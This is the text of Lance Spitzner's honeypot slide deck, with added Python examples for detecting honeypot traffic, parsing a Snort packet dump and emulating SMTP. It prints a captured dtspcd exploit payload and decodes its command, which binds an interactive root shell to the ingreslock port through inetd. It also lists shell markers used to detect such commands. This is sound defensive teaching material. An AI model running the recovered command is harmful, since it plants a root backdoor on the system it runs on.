![Page 1: Honeypots. Your Speaker Lance Spitzner –Senior Security Architect, Sun Microsystems –Founder of the Honeynet Project –Author of Honeypots: Tracking Hackers](https://reader030.vdocuments.site/reader030/viewer/2022032606/56649e8e5503460f94b91266/html5/thumbnails/1.jpg)
Honeypots
Your Speaker
Lance Spitzner
– Senior Security Architect, Sun Microsystems
– Founder of the Honeynet Project
– Author of Honeypots: Tracking Hackers
– Co-author of Know Your Enemy
– Moderator of <[email protected]> maillist
– Former ‘tread head’.
Purpose
To introduce you to honeypots: what they are, how they work, and their value.
Problem
• A variety of misconceptions about honeypots; everyone has their own definition.
• This confusion has caused a lack of understanding, and a lack of adoption.
Honeypot Timeline
• 1990/1991 - The Cuckoo's Egg and An Evening with Berferd
• 1997 - Deception Toolkit
• 1998 - CyberCop Sting
• 1998 - NetFacade (and Snort)
• 1998 - BackOfficer Friendly
• 1999 - Formation of the Honeynet Project
• 2001 - Worms captured
• 2002 - dtspcd exploit capture
Definition
Any security resource whose value lies in being probed, attacked, or compromised.
How honeypots work
• Simple concept
• A resource that expects no data, so any traffic to or from it is most likely unauthorized activity
Not limited to specific purpose
• Honeypots do not solve a specific problem; instead they are a tool that contributes to your overall security architecture.
• Their value, and the problems they help solve, depend on how you build, deploy, and use them.
Types
• Production (Law Enforcement)
• Research (Counter-Intelligence)
Marty’s idea
Value
• What is the value of honeypots?
• One of the greatest areas of confusion concerning honeypot technologies.
Advantages
• Based on how honeypots conceptually work, they have several advantages:
– Reduce False Positives and False Negatives
– Data Value
– Resources
– Simplicity
Disadvantages
• Based on the concept of honeypots, they also have disadvantages:
– Narrow Field of View
– Fingerprinting
– Risk
Production
• Prevention
• Detection
• Response
Prevention
• Keeping the burglar out of your house.
• Honeypots, in general, are not effective prevention mechanisms.
• Deception, deterrence, and decoys are psychological weapons. They do NOT work against automated attacks:
– worms
– auto-rooters
– mass-rooters
Detection
• Detecting the burglar when he breaks in.
• Honeypots excel at this capability, due to their advantages.
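The detection principle from the "How honeypots work" slide, written out as runnable logic: because a honeypot expects no traffic, detection is a lookup, not a signature match. This is an added example, not code from the deck or the Honeynet Project. The honeypot addresses, the single allow-listed monitoring host, the flow-log format and every log line are constructed for illustration.

```python
import ipaddress
from collections import defaultdict

# Constructed for the example: the honeypot addresses and the one monitoring host that
# is allowed to talk to them. In a real deployment these come from your asset inventory.
HONEYPOTS = {ipaddress.ip_address("10.10.10.2"), ipaddress.ip_address("10.10.10.200")}
ALLOWED_SOURCES = {ipaddress.ip_address("10.10.10.50")}

# Constructed flow log: "timestamp src dst dport proto", one flow per line.
SAMPLE_LOG = """\
2002-01-08T08:45:59 10.10.10.7 10.10.10.3 80 tcp
2002-01-08T08:46:01 10.10.10.1 10.10.10.2 6112 tcp
2002-01-08T08:46:02 10.10.10.1 10.10.10.200 6112 tcp
2002-01-08T08:46:04 10.10.10.1 10.10.10.2 6112 tcp
2002-01-08T08:46:10 10.10.10.50 10.10.10.2 22 tcp
2002-01-08T08:46:12 10.10.10.2 192.0.2.9 6667 tcp
2002-01-08T08:47:00 10.10.10.8 10.10.10.3 443 tcp
"""


def parse_flows(text):
    """Turn the constructed log into dicts with parsed addresses and ports."""
    flows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, dst, dport, proto = line.split()
        flows.append({"ts": ts, "src": ipaddress.ip_address(src),
                      "dst": ipaddress.ip_address(dst), "dport": int(dport), "proto": proto})
    return flows


def honeypot_alerts(flows):
    """One alert per flow that touches a honeypot.

    Inbound from anyone but the monitor is a probe or attack: nobody else has a reason
    to be there. Outbound from a honeypot is worse: it means the honeypot has been
    compromised and is being used against someone else, the risk the deck warns about.
    """
    alerts = []
    for f in flows:
        if f["src"] in HONEYPOTS and f["dst"] not in HONEYPOTS:
            alerts.append({"severity": "critical", "kind": "outbound-from-honeypot", **f})
        elif f["dst"] in HONEYPOTS and f["src"] not in ALLOWED_SOURCES:
            alerts.append({"severity": "high", "kind": "inbound-to-honeypot", **f})
    return alerts


def summarize_by_attacker(alerts):
    """Fold inbound alerts per source so a sweep across several honeypots reads as one actor."""
    by_src = defaultdict(lambda: {"count": 0, "ports": set(), "honeypots": set()})
    for a in alerts:
        if a["kind"] != "inbound-to-honeypot":
            continue
        entry = by_src[str(a["src"])]
        entry["count"] += 1
        entry["ports"].add(a["dport"])
        entry["honeypots"].add(str(a["dst"]))
    return dict(by_src)


if __name__ == "__main__":
    found = honeypot_alerts(parse_flows(SAMPLE_LOG))
    for a in found:
        print(a["severity"], a["kind"], a["ts"], a["src"], "->", a["dst"], a["dport"])
    print(summarize_by_attacker(found))
```

Two practitioner caveats follow directly from the slides. The narrow field of view: an attacker who never touches a honeypot address produces nothing here, so this complements an IDS rather than replacing it. And the low false-positive claim only holds if management traffic, broadcast noise and vulnerability scanners are allow-listed up front; otherwise they become the alerts you then learn to ignore.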
Response
• Honeypots can be used to help respond to an incident.
– Can easily be pulled offline (unlike production systems).
– Little to no data pollution.
Research Honeypots
• Early Warning and Prediction
• Discover new Tools and Tactics
• Understand Motives, Behavior, and Organization
• Develop Analysis and Forensic Skills
Early Warning and Prediction
Tools
Snort packet dump of the dtspcd exploit capture (TCP port 6112) listed in the timeline; ?? marks a byte lost in extraction.

01/08-08:46:04.378306 10.10.10.1:3592 -> 10.10.10.2:6112
TCP TTL:48 TOS:0x0 ID:41388 IpLen:20 DgmLen:1500 DF
***AP*** Seq: 0xFEE2C115  Ack: 0x5F66192F  Win: 0x3EBC  TcpLen: 32
TCP Options (3) => NOP NOP TS: 463986683 4158792
30 30 30 30 30 30 30 32 30 34 31 30 33 65 30 30  0000000204103e00
30 31 20 20 34 20 00 00 00 31 30 00 80 1C 40 11  01  4 ...10...@.
?? 1C 40 11 10 80 01 01 80 1C 40 11 80 1C 40 11  ..@.......@...@.
?? 1C 40 11 80 1C 40 11 80 1C 40 11 80 1C 40 11  ..@...@...@...@.
?? 23 FF E0 E2 23 FF E4 E4 23 FF E8 C0 23 FF EC  .#...#...#...#..
82 10 20 0B 91 D0 20 08 2F 62 69 6E 2F 6B 73 68  .. ... ./bin/ksh
20 20 20 20 2D 63 20 20 65 63 68 6F 20 22 69 6E      -c  echo "in
67 72 65 73 6C 6F 63 6B 20 73 74 72 65 61 6D 20  greslock stream
74 63 70 20 6E 6F 77 61 69 74 20 72 6F 6F 74 20  tcp nowait root
2F 62 69 6E 2F 73 68 20 73 68 20 2D 69 22 3E 2F  /bin/sh sh -i">/
74 6D 70 2F 78 3B 2F 75 73 72 2F 73 62 69 6E 2F  tmp/x;/usr/sbin/
69 6E 65 74 64 20 2D 73 20 2F 74 6D 70 2F 78 3B  inetd -s /tmp/x;
73 6C 65 65 70 20 31 30 3B 2F 62 69 6E 2F 72 6D  sleep 10;/bin/rm
20 2D 66 20 2F 74 6D 70 2F 78 20 41 41 41 41 41   -f /tmp/x AAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
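What a research honeypot actually yields from a capture like this is the attacker's tool, readable in the clear. The following is an added example, not code from the deck or the Honeynet Project: it parses Snort's hex/ASCII dump format back into bytes and pulls out the printable strings, which is what strings(1) does by hand. SAMPLE_DUMP is the header plus the last ten rows of the dump above (the rows whose every byte survived extraction); the rows before them are the exploit's machine code, which is why the command only appears once the payload is reassembled.

```python
import re

HEX_BYTE = re.compile(r"^[0-9A-Fa-f]{2}$")

# Header and the command-bearing tail of the capture on the slide.
SAMPLE_DUMP = """\
01/08-08:46:04.378306 10.10.10.1:3592 -> 10.10.10.2:6112
TCP TTL:48 TOS:0x0 ID:41388 IpLen:20 DgmLen:1500 DF
***AP*** Seq: 0xFEE2C115  Ack: 0x5F66192F  Win: 0x3EBC  TcpLen: 32
TCP Options (3) => NOP NOP TS: 463986683 4158792
82 10 20 0B 91 D0 20 08 2F 62 69 6E 2F 6B 73 68  .. ... ./bin/ksh
20 20 20 20 2D 63 20 20 65 63 68 6F 20 22 69 6E      -c  echo "in
67 72 65 73 6C 6F 63 6B 20 73 74 72 65 61 6D 20  greslock stream
74 63 70 20 6E 6F 77 61 69 74 20 72 6F 6F 74 20  tcp nowait root
2F 62 69 6E 2F 73 68 20 73 68 20 2D 69 22 3E 2F  /bin/sh sh -i">/
74 6D 70 2F 78 3B 2F 75 73 72 2F 73 62 69 6E 2F  tmp/x;/usr/sbin/
69 6E 65 74 64 20 2D 73 20 2F 74 6D 70 2F 78 3B  inetd -s /tmp/x;
73 6C 65 65 70 20 31 30 3B 2F 62 69 6E 2F 72 6D  sleep 10;/bin/rm
20 2D 66 20 2F 74 6D 70 2F 78 20 41 41 41 41 41   -f /tmp/x AAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
"""


def parse_snort_dump(text):
    """Rebuild payload bytes from Snort's 'hex  ascii' rows.

    Header lines are skipped because their first token is never a lone hex byte.
    The hex columns are separated from the ASCII column by two or more spaces
    (assumed, as in the dump above); as a fallback only leading hex tokens count,
    and a row never holds more than 16 of them.
    """
    payload = bytearray()
    for line in text.splitlines():
        hexpart = re.split(r"\s{2,}", line.strip(), maxsplit=1)[0]
        row = []
        for tok in hexpart.split():
            if len(row) == 16 or not HEX_BYTE.match(tok):
                break
            row.append(int(tok, 16))
        payload.extend(row)
    return bytes(payload)


def printable_strings(data, min_len=4):
    """Like strings(1): runs of printable ASCII at least min_len bytes long."""
    out, run = [], bytearray()
    for b in data + b"\x00":  # sentinel flushes the final run
        if 0x20 <= b < 0x7F:
            run.append(b)
        else:
            if len(run) >= min_len:
                out.append(run.decode("ascii"))
            run = bytearray()
    return out


# Substrings that mark a string as a shell command line rather than data.
SHELL_MARKERS = ("/bin/sh", "/bin/ksh", "inetd", "nowait root", "/tmp/")


def find_shell_commands(data):
    """Return the printable strings that look like commands handed to a shell."""
    return [s for s in printable_strings(data) if any(m in s for m in SHELL_MARKERS)]


if __name__ == "__main__":
    for cmd in find_shell_commands(parse_snort_dump(SAMPLE_DUMP)):
        print(cmd)
```

The recovered line reads `/bin/ksh -c echo "ingreslock stream tcp nowait root /bin/sh sh -i">/tmp/x;/usr/sbin/inetd -s /tmp/x;sleep 10;/bin/rm -f /tmp/x`: it writes a one-line inetd configuration that binds an interactive root shell to the ingreslock service, starts a second inetd with that file, then deletes it. The trailing run of A's is padding; on a real capture, running the same extraction over the whole session also turns up the attacker's follow-on downloads and IRC strings.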
Tactics
Motives and Behavior
J4ck: why don't you start charging for packet attacks?
J4ck: "give me x amount and I'll take bla bla offline for this amount of time"
J1LL: it was illegal last I checked.
J4ck: heh, then everything you do is illegal. Why not make money off of it?
J4ck: I know plenty of people that'd pay exorbitant amounts for packeting.
Level of Interaction
• Level of Interaction determines the amount of functionality a honeypot provides.
• The greater the interaction, the more you can learn.
• The greater the interaction, the more complexity and risk.
Risk
• Chance that an attacker can use your honeypot to harm, attack, or infiltrate other systems or organizations.
Low Interaction
• Provide Emulated Services
• No operating system for attacker to access.
• Information limited to transactional information and the attacker's activities with the emulated services.
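To make "emulated service, transactional information only" concrete, here is an added example, not code from the deck or from any product listed on the next slide: a low-interaction listener that emulates just enough SMTP to keep an attacker talking, records the transaction, and has no mailbox, filesystem or operating system behind it. The banner text, the port choice, the byte cap and the constructed attacker session are all assumptions made for the example.

```python
import socket
import threading
import time

# Assumptions for the example: what the fake server claims to be, and a cap on how
# much per-session data is kept so an attacker cannot fill the disk.
FAKE_BANNER = b"220 mail.example.test ESMTP Sendmail 8.9.3/8.9.3; ready\r\n"
MAX_BYTES = 4096


class LowInteractionSMTP:
    """Emulated SMTP service: canned replies only, every byte received is logged."""

    def __init__(self, host="127.0.0.1", port=0):
        self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self.sock.bind((host, port))
        self.sock.listen(5)
        self.port = self.sock.getsockname()[1]  # port 0 means "pick a free one"
        self.sessions = []

    def serve_one(self):
        """Handle a single client and return its transaction record."""
        conn, peer = self.sock.accept()
        started = time.time()
        received, pending = bytearray(), b""
        with conn:
            conn.settimeout(3.0)  # idle clients are dropped; resources stay bounded
            conn.sendall(FAKE_BANNER)
            try:
                done = False
                while not done and len(received) < MAX_BYTES:
                    chunk = conn.recv(512)
                    if not chunk:
                        break
                    received += chunk
                    pending += chunk
                    while b"\r\n" in pending:
                        line, pending = pending.split(b"\r\n", 1)
                        if line.upper().startswith(b"QUIT"):
                            conn.sendall(b"221 Bye\r\n")
                            done = True
                            break
                        conn.sendall(b"250 OK\r\n")  # every command "succeeds"; nothing runs
            except socket.timeout:
                pass
        session = {
            "peer": peer[0],
            "peer_port": peer[1],
            "start": started,
            "duration": time.time() - started,
            "bytes": len(received),
            "transcript": bytes(received),
        }
        self.sessions.append(session)
        return session

    def close(self):
        self.sock.close()


def run_demo(client_bytes=b"HELO scanner.example\r\nMAIL FROM:<nobody>\r\nQUIT\r\n"):
    """Start the honeypot on a free port, play a constructed attacker session against
    it, and return the session record plus what the attacker saw."""
    hp = LowInteractionSMTP()
    session = {}
    server = threading.Thread(target=lambda: session.update(hp.serve_one()), daemon=True)
    server.start()
    with socket.create_connection(("127.0.0.1", hp.port), timeout=3.0) as c:
        banner = c.recv(256)
        c.sendall(client_bytes)
        replies = b""
        try:
            while b"221" not in replies:
                data = c.recv(256)
                if not data:
                    break
                replies += data
        except socket.timeout:
            pass
    server.join(5.0)
    hp.close()
    session["banner_seen"] = banner
    session["replies"] = replies
    return session


if __name__ == "__main__":
    s = run_demo()
    print(s["peer"], s["bytes"], "bytes:", s["transcript"])
```

The record you get back (peer, timing, byte count, full transcript) is exactly the "transactional information" the slide describes, and it is all you get: an attacker who wants a shell finds no `vrfy`, no mail spool and no binary to exploit. That is also the limit of what this design can teach you, which is why the deck pairs it with high-interaction systems.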
High Interaction
• Provide Actual Operating Systems
• Learn extensive amounts of information.
• Extensive risk.
Honeypots
• BackOfficer Friendly – http://www.nfr.com/products/bof/
• SPECTER – http://www.specter.com
• Honeyd – http://www.citi.umich.edu/u/provos/honeyd/
• ManTrap – http://www.recourse.com
• Honeynets – http://project.honeynet.org/papers/honeynet/
(ordered from Low Interaction at the top to High Interaction at the bottom)
BackOfficer Friendly
Specter
Honeyd
# Default template: any address not bound elsewhere answers like this host.
create default
set default personality "FreeBSD 2.2.1-STABLE"
set default default action open
add default tcp port 80 "sh /usr/local/honeyd/scripts/web.sh"
add default tcp port 22 "sh /usr/local/honeyd/scripts/test.sh"
add default tcp port 113 reset
add default tcp port 1 reset

# Windows template: the personality shapes the TCP/IP stack fingerprint a scanner sees.
create windows
set windows personality "Windows NT 4.0 Server SP5-SP6"
set windows default action reset
add windows tcp port 80 "sh /usr/local/honeyd/scripts/web.sh"
add windows tcp port 25 block
# Telnet is proxied to a real host; SSH is proxied back to the attacker's own address ($ipsrc).
add windows tcp port 23 proxy real-server.tracking-hackers.com:23
add windows tcp port 22 proxy $ipsrc:22
# Uptime (seconds) the emulated stack advertises; applies to the windows template.
set windows uptime 3284460

bind 192.168.1.200 windows
ManTrap
Honeynets
Which is best?
None, they all have their advantages and disadvantages. It depends on what you are attempting to achieve.
Legal Issues
• Privacy
• Entrapment
• Liability
Legal Contact for .mil / .gov
Department of Justice, Computer Crime and Intellectual Property Section
– General Number: (202) 514-1026
– Specific Contact: Richard Salgado
• Direct Telephone: (202) 353-7848
• E-Mail: [email protected]
Summary
Honeypots are a highly flexible security tool that can be used in a variety of different deployments.
Resources
Honeypots: Tracking Hackers
http://www.tracking-hackers.com